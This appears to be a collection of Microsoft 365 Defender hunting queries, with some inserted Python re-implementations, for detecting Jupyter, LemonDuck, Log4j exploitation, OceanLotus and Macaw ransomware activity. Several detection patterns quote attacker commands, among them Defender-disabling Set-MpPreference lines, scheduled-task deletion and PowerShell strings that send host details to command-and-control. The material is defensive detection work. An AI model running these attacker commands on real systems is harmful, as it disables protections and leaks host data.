Jupyter, otherwise known as SolarMarker, is a malware family and cluster of components known for its info-stealing and backdoor capabilities. It proliferates mainly through search engine optimization manipulation and malicious advertising in order to encourage users to download malicious templates and documents. This malware has been popular since 2020 and is still active as of 2021.

# Jupyter's SEO Delivery via .TK domains

The following query checks for more than 5 instances of a .tk domain being contacted within a 10 minute interval. This malware frequently uses anywhere from 5-10 .TK domains, as well as other uncommon TLDs such as .blog, .site, .ml, and .gq; these domains appear randomly generated and are contacted after a query to a hosting provider or advertising site from a search engine. This activity is followed by the download of the malicious file.

## Query

```
DeviceNetworkEvents
| where RemoteUrl endswith ".tk"
| summarize make_set(RemoteUrl) by DeviceId,bin(Timestamp, 10m)
| extend domainCount = array_length(set_RemoteUrl)
| where domainCount >= 5
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | v | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft Threat Protection team

================================================
FILE: Campaigns/LemonDuck/LemonDuck-competition-killer.md
================================================

# LemonDuck competition killer script execution

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

## Query

This query looks for instances of the LemonDuck component KR.Bin, which is intended to kill competition prior to making the installation and persistence of the malware concrete. The killer script used is based on historical versions from 2018 and earlier, which have grown over time to include scheduled task and service names of various botnets, malware, and other competing services. The version currently in use by LemonDuck has approximately 40-60 scheduled task names. The upper maximum in this query can be modified and adjusted to include time bounding.
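Two of the queries in this section, the .tk domain burst query above and the competition-killer query that follows, re-implemented in Python as an added example (not code from the repository) and run over constructed sample events. It approximates Kusto's `bin()`, `make_set()` and `has` operators, and shows the tumbling-window edge case where a .tk contact just past the 10-minute boundary is not counted with the burst.

```python
"""Added example (not repository code): two hunting queries re-implemented
in Python over constructed telemetry. Kusto operators are approximated:
bin() is a fixed tumbling window, make_set() is a Python set, and `has`
is a whole-term (not substring) match."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

_TERM = re.compile(r"[a-z0-9]+")


def has_term(text, term):
    """Approximate Kusto `has`: case-insensitive match on whole terms, so
    "ok" matches 'schtasks /TN ok' but not 'schtasks /TN token'."""
    words = _TERM.findall(text.lower())
    needle = _TERM.findall(term.lower())
    n = len(needle)
    return n > 0 and any(words[i:i + n] == needle for i in range(len(words) - n + 1))


def bin_timestamp(ts, window):
    """Kusto bin(Timestamp, window): floor to the start of a fixed window."""
    epoch = datetime(1970, 1, 1)
    return epoch + ((ts - epoch) // window) * window


def tk_domain_bursts(network_events, window=timedelta(minutes=10), threshold=5):
    """DeviceNetworkEvents | where RemoteUrl endswith ".tk"
    | summarize make_set(RemoteUrl) by DeviceId, bin(Timestamp, 10m)
    | extend domainCount = array_length(set_RemoteUrl) | where domainCount >= 5
    Returns {(DeviceId, bin_start): sorted distinct .tk URLs} for hits only."""
    sets = defaultdict(set)
    for ev in network_events:
        if not ev["RemoteUrl"].lower().endswith(".tk"):  # Kusto endswith is case-insensitive
            continue
        sets[(ev["DeviceId"], bin_timestamp(ev["Timestamp"], window))].add(ev["RemoteUrl"])
    return {key: sorted(urls) for key, urls in sets.items() if len(urls) >= threshold}


def lemonduck_killer_candidates(process_events, low=40, high=80,
                                markers=("Mysa", "Sorry", "Oracle Java Update", "ok")):
    """DeviceProcessEvents | where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
    | summarize make_set(ProcessCommandLine) by DeviceId
    | extend DeleteVolume = array_length(set_ProcessCommandLine)
    | where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok")
    | where DeleteVolume >= 40 and DeleteVolume <= 80
    Returns {DeviceId: DeleteVolume} for devices inside the band that show a marker name."""
    required = ("schtasks.exe", "/Delete", "/TN", "/F")
    per_device = defaultdict(set)
    for ev in process_events:
        if all(has_term(ev["ProcessCommandLine"], t) for t in required):
            per_device[ev["DeviceId"]].add(ev["ProcessCommandLine"])
    hits = {}
    for device, cmds in per_device.items():
        if any(has_term(c, m) for c in cmds for m in markers) and low <= len(cmds) <= high:
            hits[device] = len(cmds)
    return hits


# --- constructed sample telemetry (hypothetical device ids and hosts, not real IoCs) ---
_T0 = datetime(2021, 7, 1, 12, 2)
NETWORK_EVENTS = (
    # dev-A: six distinct .tk hosts inside the 12:00-12:10 bin -> hit
    [{"DeviceId": "dev-A", "Timestamp": _T0 + timedelta(minutes=i),
      "RemoteUrl": f"host{i}.example.tk"} for i in range(6)]
    # a seventh .tk host at 12:11 lands in the next bin and is not counted with the burst
    + [{"DeviceId": "dev-A", "Timestamp": _T0 + timedelta(minutes=9), "RemoteUrl": "late.example.tk"}]
    # dev-B: three .tk hosts plus unrelated traffic -> below threshold
    + [{"DeviceId": "dev-B", "Timestamp": _T0, "RemoteUrl": u}
       for u in ("a.example.tk", "b.example.tk", "c.example.tk", "cdn.example.com")]
)

_TASKS = ["Mysa", "Sorry"] + [f"Task{i}" for i in range(43)]  # 45 distinct task names
PROCESS_EVENTS = (
    # dev-C: 45 distinct deletions including marker names -> inside the 40-80 band
    [{"DeviceId": "dev-C", "ProcessCommandLine": f'schtasks.exe /Delete /TN "{n}" /F'} for n in _TASKS]
    # dev-D: same marker names but only a handful of deletions -> below the band
    + [{"DeviceId": "dev-D", "ProcessCommandLine": f'schtasks.exe /Delete /TN "{n}" /F'} for n in _TASKS[:5]]
    # dev-E: bulk deletions with no marker name -> filtered out by has_any
    + [{"DeviceId": "dev-E", "ProcessCommandLine": f'schtasks.exe /Delete /TN "Job{i}" /F'} for i in range(50)]
)

if __name__ == "__main__":
    print(tk_domain_bursts(NETWORK_EVENTS))            # one hit: dev-A, bin 12:00, 6 domains
    print(lemonduck_killer_candidates(PROCESS_EVENTS))  # {'dev-C': 45}
```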
```
DeviceProcessEvents
| where ProcessCommandLine has_all("schtasks.exe","/Delete","/TN","/F")
| summarize make_set(ProcessCommandLine) by DeviceId
| extend DeleteVolume = array_length(set_ProcessCommandLine)
| where set_ProcessCommandLine has_any("Mysa","Sorry","Oracle Java Update","ok")
| where DeleteVolume >= 40 and DeleteVolume <= 80
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/LemonDuck/LemonDuck-component-download-structure.md
================================================

# LemonDuck component download structure

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.

## Query

This query looks for any instance of the current version of the LemonDuck component collection commands, even if the component names change.
This structure has changed and may continue to change over time in order to evade detection. The query surfaces behavior that collects mining, secondary malware and lateral movement executables from external sites, and will typically return downloads of files such as "if.bin" or "kr.bin" or additional mining components.

```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "cmd.exe"
| where InitiatingProcessCommandLine has_all("echo","tmp+",".bin","gmd5","downloaddata","down_url")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/LemonDuck/LemonDuck-component-names.md
================================================

# LemonDuck common external component names

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query

This query looks for instances of the callback actions that attempt to evade detection while downloading supporting scripts, such as those that enable the “Killer” and “Infection” functions for the malware, as well as the mining components and potential secondary functions. This query only encompasses the most common component names.

```
DeviceProcessEvents
| where InitiatingProcessFileName =~ "cmd.exe"
| where InitiatingProcessCommandLine has_any("kr.bin","if.bin","m6.bin")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | v | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | v | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | v | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | v | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/LemonDuck/LemonDuck-control-structure.md
================================================

# LemonDuck command-and-control contact structure

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query

This query looks for the unique method of contacting the command-and-control (C2) infrastructure for LemonDuck in order to register updates from the bot client or exfiltrate data. This structure has changed over time; the most recent iteration is active as of this report and from June-July 2021.

```
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "powershell.exe"
| where InitiatingProcessCommandLine has_all("Exponent=","FromBase64String","$url+")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | v | |
| Exfiltration | v | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/LemonDuck/LemonDuck-defender-exclusions.md
================================================

# LemonDuck Microsoft Defender drive exclusion tampering

LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.
## Query This query looks for a command line event where LemonDuck or other like malware might attempt to modify Defender by disabling real-time monitoring functionality or adding entire drive letters to the exclusion criteria. The exclusion additions will often succeed even if tamper protection is enabled due to the design of the application. Custom alerts could be created in an environment for particular drive letters common in the environment. ``` DeviceProcessEvents | where InitiatingProcessCommandLine has_all ("Set-MpPreference", "DisableRealtimeMonitoring", "Add-MpPreference", "ExclusionProcess") | project ProcessCommandLine, InitiatingProcessCommandLine, DeviceId, Timestamp ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-email-subjects.md ================================================ # LemonDuck Email Subjects LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. 
Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query looks for subject lines that are present from 2020 to 2021 in dropped scripts that attach malicious LemonDuck samples to emails and mail it to contacts of the mailboxes on impacted machines. Additionally, checks if Attachments are present in the mailbox. General attachment types to check for at present are .doc, .zip or .js, though this could be subject to change as well as the subjects themselves. ``` EmailEvents | where Subject in ('The Truth of COVID-19','COVID-19 nCov Special info WHO','HALTH ADVISORY:CORONA VIRUS', 'WTF','What the fcuk','good bye','farewell letter','broken file','This is your order?') | where AttachmentCount >= 1 ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-id-generation.md ================================================ # LemonDuck command-and-control ID generation LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. 
First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query checks for the current method of exfiltrating basic component information to LemonDuck command and control servers. In previous iterations other methods were used and currently this logic is included at the end of callout to the server to identify the client. ``` DeviceNetworkEvents | where InitiatingProcessFileName =~ "powershell.exe" | where InitiatingProcessCommandLine endswith "(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/LemonDuck/LemonDuck-registration-function.md ================================================ # LemonDuck botnet registration functions LemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. 
First discovered in 2019, LemonDuck has since adopted more sophisticated behavior and escalated its operations in 2021. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity. ## Query This query looks for instances of function runs with name “SIEX”, which within the Lemon Duck initializing scripts is used to assign a specific user-agent for reporting back to command-and-control infrastructure with. This query should be accompanied by additional surrounding logs showing successful downloads from component sites. ``` DeviceEvents | where ActionType == "PowerShellCommand" | where AdditionalFields =~ "{\"Command\":\"SIEX\"}" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | v | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | v | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Log4J/Alerts related to Log4j vulnerability.md ================================================ # Alerts related to Log4j vulnerability Microsoft has observed attackers exploiting vulnerabilities associated with Log4J. ## Query This query looks for alerts related to the Log4J vulnerability. Devices with these alerts should be investigated for potential malicious activity. 
``` AlertInfo | where Title in~('Suspicious script launched', 'Exploitation attempt against Log4j (CVE-2021-44228)', 'Suspicious process executed by a network service', 'Possible target of Log4j exploitation (CVE-2021-44228)', 'Possible target of Log4j exploitation', 'Possible Log4j exploitation', 'Network connection seen in CVE-2021-44228 exploitation', 'Log4j exploitation detected', 'Possible exploitation of CVE-2021-44228', 'Possible target of Log4j vulnerability (CVE-2021-44228) scanning', 'Possible source of Log4j exploitation', 'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j 'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt ) ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | v | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Campaigns/Log4J/Devices with Log4j vulnerability alerts and additional other alert related context.md ================================================ # Devices with Log4j vulnerability alerts and additional other alert related context Microsoft has observed threat actors exploiting vulnerabilities associated with Log4J. 
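The query in this file (under **Query** below) pivots in two steps: it first collects the devices carrying a Log4j-related alert, then lists every alert seen on those devices per day. The following Python is an added example, not code from this repository, that emulates that pivot over constructed `AlertInfo` and `AlertEvidence` rows (the device ids, alert ids and the non-Log4j alert titles are hypothetical) so the join logic can be checked offline before relying on the hunt.

```python
"""Added example, not repository code: emulates the two-step device pivot of
the 'Devices with Log4j vulnerability alerts' query over constructed rows."""
from collections import defaultdict

# The `Title in~ (...)` list from the query; in~ is case-insensitive.
LOG4J_ALERT_TITLES = {t.lower() for t in (
    "Suspicious script launched",
    "Exploitation attempt against Log4j (CVE-2021-44228)",
    "Suspicious process executed by a network service",
    "Possible target of Log4j exploitation (CVE-2021-44228)",
    "Possible target of Log4j exploitation",
    "Possible Log4j exploitation",
    "Network connection seen in CVE-2021-44228 exploitation",
    "Log4j exploitation detected",
    "Possible exploitation of CVE-2021-44228",
    "Possible target of Log4j vulnerability (CVE-2021-44228) scanning",
    "Possible source of Log4j exploitation",
    "Log4j exploitation attempt via cloud application",
    "Log4j exploitation attempt via email",
)}


def log4j_devices(alert_info, alert_evidence):
    """Step 1 (the `let DevicesLog4JAlerts = ...` block): AlertInfo filtered by
    title, inner-joined to AlertEvidence on AlertId, keeping non-empty DeviceIds."""
    log4j_alert_ids = {a["AlertId"] for a in alert_info
                       if a["Title"].lower() in LOG4J_ALERT_TITLES}
    return {e["DeviceId"] for e in alert_evidence
            if e["AlertId"] in log4j_alert_ids and e["DeviceId"]}


def device_alert_context(alert_info, alert_evidence):
    """Step 2: every AlertEvidence row on an affected device, left-joined to
    AlertInfo for its title and grouped by DeviceId and bin(Timestamp, 1d)."""
    devices = log4j_devices(alert_info, alert_evidence)
    title_by_id = {a["AlertId"]: a["Title"] for a in alert_info}
    grouped = defaultdict(lambda: {"DeviceAlerts": set(), "AlertIDs": set()})
    for e in alert_evidence:
        if e["DeviceId"] not in devices:
            continue
        day = e["Timestamp"][:10]  # ISO-8601 timestamps: the date is the 1d bin
        bucket = grouped[(e["DeviceId"], day)]
        title = title_by_id.get(e["AlertId"])  # None when leftouter finds no row
        if title is not None:  # make_set() skips nulls
            bucket["DeviceAlerts"].add(title)
        bucket["AlertIDs"].add(e["AlertId"])
    return {key: {"DeviceAlerts": sorted(v["DeviceAlerts"]),
                  "AlertIDs": sorted(v["AlertIDs"])}
            for key, v in grouped.items()}


# Constructed sample rows: hypothetical ids, and constructed non-Log4j titles.
SAMPLE_ALERT_INFO = [
    {"AlertId": "da-1", "Title": "Possible target of Log4j exploitation"},
    {"AlertId": "da-2", "Title": "Anomalous account lookup (constructed)"},
    {"AlertId": "da-3", "Title": "Anomalous account lookup (constructed)"},
    {"AlertId": "da-4", "Title": "Suspicious scheduled task (constructed)"},
]
SAMPLE_ALERT_EVIDENCE = [
    {"AlertId": "da-1", "DeviceId": "DEV-1", "Timestamp": "2021-12-12T08:00:00Z"},
    {"AlertId": "da-1", "DeviceId": "", "Timestamp": "2021-12-12T08:00:00Z"},  # non-device evidence, dropped
    {"AlertId": "da-2", "DeviceId": "DEV-1", "Timestamp": "2021-12-12T11:30:00Z"},
    {"AlertId": "da-3", "DeviceId": "DEV-2", "Timestamp": "2021-12-12T12:00:00Z"},  # no Log4j alert: excluded
    {"AlertId": "da-4", "DeviceId": "DEV-1", "Timestamp": "2021-12-13T02:15:00Z"},
    {"AlertId": "da-5", "DeviceId": "DEV-1", "Timestamp": "2021-12-13T04:00:00Z"},  # no AlertInfo row
]

if __name__ == "__main__":
    context = device_alert_context(SAMPLE_ALERT_INFO, SAMPLE_ALERT_EVIDENCE)
    for (device, day), ctx in sorted(context.items()):
        print(device, day, ctx)
```

Note that `DEV-2`, which only has a non-Log4j alert, never appears in the output, while `da-5` is kept by the left-outer join even though it has no `AlertInfo` row; that mirrors what the real query returns when `AlertEvidence` references an alert missing from `AlertInfo`.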
## Query

This query looks for devices that have alerts for suspected Log4J vulnerability exploitation, and lists the other alerts observed on those devices within a given timeframe.

```
// Get any devices with Log4J related Alert Activity
let DevicesLog4JAlerts = AlertInfo
| where Title in~('Suspicious script launched',
    'Exploitation attempt against Log4j (CVE-2021-44228)',
    'Suspicious process executed by a network service',
    'Possible target of Log4j exploitation (CVE-2021-44228)',
    'Possible target of Log4j exploitation',
    'Possible Log4j exploitation',
    'Network connection seen in CVE-2021-44228 exploitation',
    'Log4j exploitation detected',
    'Possible exploitation of CVE-2021-44228',
    'Possible target of Log4j vulnerability (CVE-2021-44228) scanning',
    'Possible source of Log4j exploitation',
    'Log4j exploitation attempt via cloud application', // Previously titled Exploitation attempt against Log4j
    'Log4j exploitation attempt via email' // Previously titled Log4j Exploitation Attempt
    )
// Join in evidence information
| join AlertEvidence on AlertId
| where DeviceId != ""
| summarize by DeviceId, Title;
// Get additional alert activity for each device
AlertEvidence
| where DeviceId in(DevicesLog4JAlerts)
// Add additional info
| join kind=leftouter AlertInfo on AlertId
| summarize DeviceAlerts = make_set(Title), AlertIDs = make_set(AlertId) by DeviceId, bin(Timestamp, 1d)
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Log4J/Suspicious JScript staging comment.md
================================================
# Suspicious JScript staging comment

Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability using identifiable strings in PowerShell commands.

## Query

This query identifies a unique string present in malicious PowerShell commands attributed to threat actors exploiting vulnerable Log4j applications. These events warrant further investigation to determine whether they are in fact related to a vulnerable Log4j application.

```
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has "VMBlastSG"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Log4J/Suspicious PowerShell curl flags.md
================================================
# Suspicious PowerShell curl flags

Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability using uncommon PowerShell flags to communicate with command-and-control infrastructure.

## Query

This query identifies unique, uncommon PowerShell flags used by curl to post the results of an attacker-executed command back to the command-and-control infrastructure. In Windows PowerShell, `curl` is an alias of `Invoke-WebRequest`, and `-met` is an abbreviated form of its `-Method` parameter. If the event is a true positive, the contents of the “Body” argument are the Base64-encoded results of an attacker-issued command. These events warrant further investigation to determine whether they are in fact related to a vulnerable Log4j application.

```
DeviceProcessEvents
| where FileName =~ "powershell.exe"
| where ProcessCommandLine has_all("-met", "POST", "-Body")
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Log4J/Suspicious process event creation from VMWare Horizon TomcatService.md
================================================
# Suspicious process event creation from VMWare Horizon TomcatService

Microsoft has observed attackers who have gained entry to an environment via the Log4J vulnerability using the ws_TomcatService.exe process to launch malicious processes.

## Query

This query identifies anomalous child processes of the ws_TomcatService.exe process associated with exploitation of the Log4j vulnerability in VMWare Horizon installations. These events warrant further investigation to determine whether they are in fact related to a vulnerable Log4j application.

```
DeviceProcessEvents
| where InitiatingProcessFileName has "ws_TomcatService.exe"
| where FileName != "repadmin.exe"
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/MacOceanLotusBackdoor.txt
================================================
// Backdoor processes associated with OceanLotus Mac Malware Backdoor
// References:
// https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/
//
// OS platforms: Macintosh
DeviceProcessEvents
| where Timestamp > ago(14d)
| where FileName in~ ("screenassistantd","spellagentd")
| top 100 by Timestamp

================================================
FILE: Campaigns/MacOceanLotusDropper.txt
================================================
// Backdoor processes associated with OceanLotus Mac malware backdoor dropper
// References:
// https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/
// OS Platforms: Macintosh
DeviceProcessEvents
| where Timestamp > ago(14d)
| where ProcessCommandLine contains "theme0"
| project Timestamp, DeviceId, DeviceName, AccountName, AccountSid, InitiatingProcessCommandLine, ProcessCommandLine
| top 100 by Timestamp

================================================
FILE: Campaigns/Macaw Ransomware/Disable Controlled Folders.md
================================================
# Macaw ransomware - Disable Controlled Folders

Prior to deploying Macaw ransomware in an organization, the adversary will disable all controlled folders, which will enable them to be encrypted once the ransomware payload is deployed.

## Query

This query looks for instances where the attacker has disabled the use of controlled folders.

```
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'cmd.exe'
| where FileName =~ 'powershell.exe' and ProcessCommandLine has('powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"')
```

## Category

This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.

| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |

## Contributor info

**Contributor:** Microsoft 365 Defender team

================================================
FILE: Campaigns/Macaw Ransomware/Imminent Ransomware.md
